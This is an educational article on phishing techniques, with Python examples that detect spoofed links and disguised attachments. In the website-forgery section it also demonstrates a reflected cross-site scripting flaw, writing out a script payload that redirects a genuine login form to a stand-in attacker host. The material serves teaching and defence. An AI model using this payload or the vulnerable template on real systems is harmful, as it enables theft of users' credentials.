In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information. Phishing, also known as brand spoofing or carding, is a variation on “fishing”: bait is thrown out in the hope that, while most recipients will ignore it, some will be tempted into biting. Besides usernames and passwords, phishers also go after credit card numbers, bank account numbers and social security numbers. The damage caused by phishing ranges from denial of access to e-mail to substantial financial loss.
A typical example is an e-mail sent to a user that falsely claims to come from an established, legitimate enterprise, in an attempt to scam the user into surrendering private information that will then be used for identity theft. The e-mail directs the user to a Web site where they are asked to “update” personal information, such as passwords and credit card, social security and bank account numbers, that the legitimate organization already holds. The Web site, however, is fake and exists only to steal the user’s information. Many phishing scams of this kind have occurred.
The list of phishing techniques is given as follows:
1. Spear Phishing
Spear-phishing attacks are aimed at specific individuals or organizations and generally arrive as e-mails that appear to come from trusted sources. They might contain a malicious attachment or a link to a malicious website, which the recipient is encouraged to open in order to obtain important information about a company matter.
Once the recipient clicks the link, the browser is directed to a malicious site, where malware is downloaded surreptitiously to the computer. The malware allows an attacker to control the victim’s computer remotely and steal log-in information for banking accounts or for protected internal company systems.
2. Link manipulation
Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs and the use of subdomains are common tricks. In the example URL http://www.xyz..com/, it appears as though the link will take you to the XYZ website, but it actually leads elsewhere. Another common trick is to make the displayed text for a link (the text between the <A> tags) suggest a reliable destination when the link actually goes to the phisher’s site.
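The two tricks just described (a trusted name buried as a subdomain of another domain, and link text that shows one address while the href points to another) can both be checked mechanically. The following Python script is an added example, not code from the original article: it walks the anchors in an HTML e-mail body and flags the mismatches. The sample e-mail, the domain `example-bank.com`, the attacker host and the IP address are all constructed for illustration, and the two-label “registrable domain” helper is a deliberate simplification of what the Public Suffix List would give you.

```python
"""Flag link-manipulation tricks in an HTML e-mail body (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: the domain(s) the spoofed organisation really uses.
TRUSTED_DOMAINS = {"example-bank.com"}

# Visible link text that itself looks like a URL or hostname.
URL_LIKE = re.compile(r"(?:https?://)?[\w-]+(?:\.[\w-]+)+(?:/\S*)?")
BARE_IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def registrable_domain(host):
    """Crude eTLD+1 (last two labels). Fine for .com-style hosts; a real
    deployment would consult the Public Suffix List instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


class AnchorCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyse_links(html_body):
    """Return (href, reason) pairs for anchors that look manipulated."""
    parser = AnchorCollector()
    parser.feed(html_body)
    parser.close()
    findings = []
    for href, text in parser.links:
        real_host = urlparse(href).hostname or ""
        real_domain = registrable_domain(real_host)
        # Trick 1: trusted brand used as a subdomain of an unrelated domain,
        # e.g. www.example-bank.com.attacker.example
        for trusted in TRUSTED_DOMAINS:
            if trusted in real_host and real_domain != trusted:
                findings.append((href, "trusted name %s used as a subdomain of %s"
                                 % (trusted, real_domain)))
        # Trick 2: the visible text is a URL that does not match the real target.
        if URL_LIKE.fullmatch(text):
            shown = text if "://" in text else "http://" + text
            shown_host = urlparse(shown).hostname or ""
            if registrable_domain(shown_host) != real_domain:
                findings.append((href, "displays %s but points to %s"
                                 % (shown_host, real_host)))
        # Bonus check: a bare IP address instead of a hostname.
        if BARE_IPV4.fullmatch(real_host):
            findings.append((href, "target is a bare IP address"))
    return findings


# Constructed sample message: two manipulated links and one genuine one.
SAMPLE_EMAIL = """
<p>Dear customer,</p>
<p><a href="http://www.example-bank.com.attacker.example/login">Verify your account</a></p>
<p><a href="http://203.0.113.5/secure">https://www.example-bank.com/secure</a></p>
<p><a href="https://www.example-bank.com/help">Help centre</a></p>
"""

if __name__ == "__main__":
    for href, reason in analyse_links(SAMPLE_EMAIL):
        print(href, "->", reason)
```

The first link trips the subdomain check, the second trips both the display-text mismatch and the bare-IP check, and the genuine help-centre link produces nothing. Mail gateways apply the same comparison to the `href` versus the rendered text; a user can approximate it by hovering over a link before clicking.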
3. Filter Evasion
Facebook routinely sends an e-mail to notify users when another Facebook user adds them as a friend. In one campaign, spammers imitated that notification and included a zip attachment that purported to contain a picture; when the recipient double-clicked it, the Trojan horse file inside was executed on the user’s machine. Phishers have also used images instead of text to make it harder for anti-phishing filters to detect the wording commonly used in phishing e-mails.
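Both evasions above leave traces a filter can look for: an HTML body that carries almost no text but at least one image, and an archive attachment whose members are executables. The Python script below is an added example, not code from the original article; it builds a “friend request” message in memory in the style the text describes (sender, recipient, banner image and the `photo.jpg.exe` inside `photo.zip` are all constructed) and then scans it with the standard library’s `email` and `zipfile` modules.

```python
"""Spot image-only bodies and executables hidden in zip attachments (added example)."""
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs")


def build_sample_message(malicious=True):
    """Construct a notification-style message. With malicious=True the HTML
    body is a lone image and a zip hides a double-extension executable."""
    msg = EmailMessage()
    msg["From"] = "notification@social.example"   # constructed sender
    msg["To"] = "victim@example.org"              # constructed recipient
    msg["Subject"] = "Someone added you as a friend"
    msg.set_content("You have a new friend request.")
    if malicious:
        msg.add_alternative(
            '<html><body><img src="cid:banner@social.example"></body></html>',
            subtype="html")
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("photo.jpg.exe", b"MZ\x90\x00 not a real program")
        msg.add_attachment(buf.getvalue(), maintype="application",
                           subtype="zip", filename="photo.zip")
    else:
        msg.add_alternative(
            "<html><body><p>You have a new friend request. "
            "Visit the site to respond.</p></body></html>", subtype="html")
    return msg.as_bytes()


def analyse_message(raw):
    """Return a list of human-readable findings for a raw RFC 5322 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "text/html":
            html = part.get_content()
            images = len(re.findall(r"<img\b", html, re.I))
            visible = re.sub(r"<[^>]+>", "", html).strip()
            if images and len(visible) < 20:
                findings.append("html body is image-only (%d img, %d chars of visible text)"
                                % (images, len(visible)))
        elif part.get_content_disposition() == "attachment":
            name = (part.get_filename() or "").lower()
            payload = part.get_payload(decode=True) or b""
            if name.endswith(".zip"):
                try:
                    with zipfile.ZipFile(io.BytesIO(payload)) as zf:
                        for member in zf.namelist():
                            if member.lower().endswith(EXECUTABLE_EXT):
                                findings.append("archive %s contains executable %s"
                                                % (name, member))
                except zipfile.BadZipFile:
                    findings.append("attachment %s claims to be a zip but is not" % name)
            elif name.endswith(EXECUTABLE_EXT):
                findings.append("attachment %s is an executable" % name)
    return findings


if __name__ == "__main__":
    for line in analyse_message(build_sample_message()):
        print(line)
```

The malicious message yields two findings (the image-only HTML part and the executable inside the archive); the benign variant yields none. Note that the check inspects the archive’s contents rather than trusting the `.zip` name or the `.jpg` that precedes `.exe`, which is exactly the point of the double extension.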
4. Website Forgery
Another technique of smart phishing. Once a victim visits the phishing website, the deception is not over. An attacker can also use flaws in a trusted website’s own scripts (known as cross-site scripting) against the victim. These attacks are particularly harmful because they direct the user to sign in at their bank’s or service’s own web page, where everything from the web address to the security certificate appears correct. Just such a flaw was used in 2006 against PayPal.
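To make concrete how a flaw in the trusted site’s own page lets a phisher keep the genuine address and certificate, here is an added Python example (not code from the original article, and not PayPal’s code). `render_login_vulnerable` echoes a `msg` query parameter into the login page unescaped, the kind of reflected cross-site scripting flaw the text refers to; `render_login_fixed` is the same page with the parameter HTML-escaped. The domain `www.example-bank.com`, the `msg` parameter and the attacker host are constructed for illustration.

```python
"""Reflected XSS on a trusted login page, vulnerable and fixed (added example)."""
import html
from urllib.parse import urlparse, parse_qs

# Minimal login page; {notice} is the only substitution point.
TEMPLATE = (
    '<html><body><h1>Sign in to Example Bank</h1>'
    '<p class="notice">{notice}</p>'
    '<form method="post" action="/login">'
    '<input name="user"><input name="pass" type="password">'
    '</form></body></html>'
)


def notice_from_url(url):
    """Pull the 'msg' query parameter that a phishing link can carry."""
    return parse_qs(urlparse(url).query).get("msg", [""])[0]


def render_login_vulnerable(url):
    # Attacker-controlled text is placed straight into the HTML.
    return TEMPLATE.format(notice=notice_from_url(url))


def render_login_fixed(url):
    # Same page, but the parameter is escaped before insertion.
    return TEMPLATE.format(notice=html.escape(notice_from_url(url), quote=True))


def contains_script(page):
    """True if the rendered page carries an injected <script> element."""
    return "<script" in page.lower()


# Constructed phishing link: the host is the real bank, only the query is hostile.
# Decoded, msg is:
#   <script>document.forms[0].action="https://attacker.example/steal"</script>
# i.e. the injected script re-points the genuine login form at the phisher.
PHISHING_URL = (
    "https://www.example-bank.com/login?msg="
    "%3Cscript%3Edocument.forms%5B0%5D.action%3D%22"
    "https%3A%2F%2Fattacker.example%2Fsteal%22%3C%2Fscript%3E"
)

if __name__ == "__main__":
    print("vulnerable page injected:", contains_script(render_login_vulnerable(PHISHING_URL)))
    print("fixed page injected:     ", contains_script(render_login_fixed(PHISHING_URL)))
```

In the vulnerable rendering the victim sees the bank’s real URL and a valid certificate, yet the form now posts the credentials to the attacker; the escaped version shows the payload as harmless text. Output encoding at every point where untrusted input meets HTML is the standard fix.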
5. Phone Phishing
Also known as vishing (voice phishing). It uses fake caller-ID data to make calls appear to come from a trusted organization. In some cases, messages claiming to be from a bank told users to dial a phone number regarding problems with their bank accounts. Once the number (owned by the phisher and provided by a Voice over IP service) was dialed, prompts told users to enter their account numbers and PIN.
There are many more types of phishing. Some of them are briefly defined below.
- Keyloggers and Screenloggers are special types of malware that record keyboard input (or screen contents) and send the relevant information to the attacker over the Internet. They can embed themselves into users’ browsers as small utility programs known as browser helper objects that run automatically when the browser is started, or into system files as device drivers or screen monitors. For example, screenshots of the system can be sent directly to the attacker’s e-mail address.
- Session Hijacking describes an attack where users’ activities are monitored until they establish their bona fide credentials. At that point, the malicious software takes over and can undertake unauthorized actions, such as transferring funds, without the user’s knowledge.
- System Reconfiguration Attacks modify settings on a user’s PC for malicious purposes. For example, URLs in a favorites file might be modified to direct users to look-alike websites.
- Man-in-the-Middle Phishing is harder to detect than many other forms of phishing. In these attacks, attackers position themselves between the user and the legitimate website or system. They record the information being entered but continue to pass it on, so that the user’s transactions are not affected. Later they can sell or use the information or credentials collected, once the user is no longer active on the system.
- Search Engine Phishing occurs when phishers create websites with attractive sounding offers and have them indexed legitimately with search engines. Users find the sites in the normal course of searching for products or services and are fooled into giving up their information.
There are several different techniques to combat phishing, including legislation and technology created specifically to protect against phishing. Most new internet browsers come with anti-phishing software.